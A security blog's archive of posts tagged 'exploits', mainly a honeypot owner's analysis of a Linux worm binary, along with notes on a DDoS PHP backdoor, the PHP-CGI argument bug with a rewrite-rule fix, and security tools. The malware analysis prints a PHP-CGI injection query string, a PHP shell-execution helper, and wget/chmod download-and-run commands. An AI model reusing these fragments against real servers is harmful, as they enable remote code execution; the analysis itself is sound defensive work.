Posts Tagged ‘exploits’

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd

So I took a a look at this binary which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try “strings”:

first nothing new.. but then I saw:

74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Connection: close
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);

What the heck..? And who is “zollard”?


#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n



further on:

function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86
myshellexec(“chmod +x /tmp/x86”);

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86
myshellexec(“chmod +x /tmp/x86”);
HTTP/1.1 200 OK

A few lines more: It installes “iptables”, droppes every telnet connection ands starts

its own telnet-daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP

In the end the program destroys its sources (rm -rf)  and runs in

mkdir -p

The last lines:

chmod +x
cp /bin/sh

So it ends up with some kind of crypto..

Virustotal shows a hitrate of 2 out of 47,  well, it is no windows binary..

Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials

from?  I guess I have to take a further look..




There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l

which is from the log-lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6,
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6,


#### Update 2 ###


I executed the script on a linux vmware after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module


Immediatly the machine starts exchanging traffic with : 58455

ans starts also listening on this port 58455

Looks like my machine started scanning the ip-range 117.201.16.* on that port –

I receive answers from there…  No httpd oder telnetd daemons are listening in “ps”, which I expected.

The command “pstree” shows a httpd, though! Different childrens  are running, the last one has a connection

to Looks like the “ps”executable has been changed.

Will see, what else can be found. Now it is “St. Martin” – time..:-)










DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any

A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:


Here we can see that a POST action “stop” makes the DDoS go away..

function stoped()
cmdexec("killall ping;");
print "Stop & Clean";

And here is where the typo sits:

if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request




good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

Seems like a good source for information.


Friday, May 4th, 2012

If you run PHP in cgi-mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s to an url can show the source code or even inject or run parametes in the shell.

Until an update exists it might be wise to filter out some string-elements (like “-” without “=”)
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

bind 9 *again* vulnerable

Thursday, November 17th, 2011

Shortly after the last remote DoS vulnerability of bind 9 ISC announced another possibilty to crash a server (this time only on recursive resolvers). See CVE-2011-4313 for more infos.


Saturday, May 8th, 2010

On the last meeting of the AK Sicherheit (ECO Verband) we could see a live demo
of the tool Beef (Browser Exploitation Framework). Nice to see that XSS-attacks
(cross-site-scripting) is not only a nice POP-UP window, but is indeed a real attack
vector for anyone.
Try yourself, the software can be downloaded from


Wednesday, October 21st, 2009

A post in Full Disclosure reminded me of Nikto,
a security tool for webservices. Based on libwhisker it tests a whole lot of possible bugs
in a webserver/application. Works nice .. just wondering why it says runs on Microsoft IIS 5/0 ..?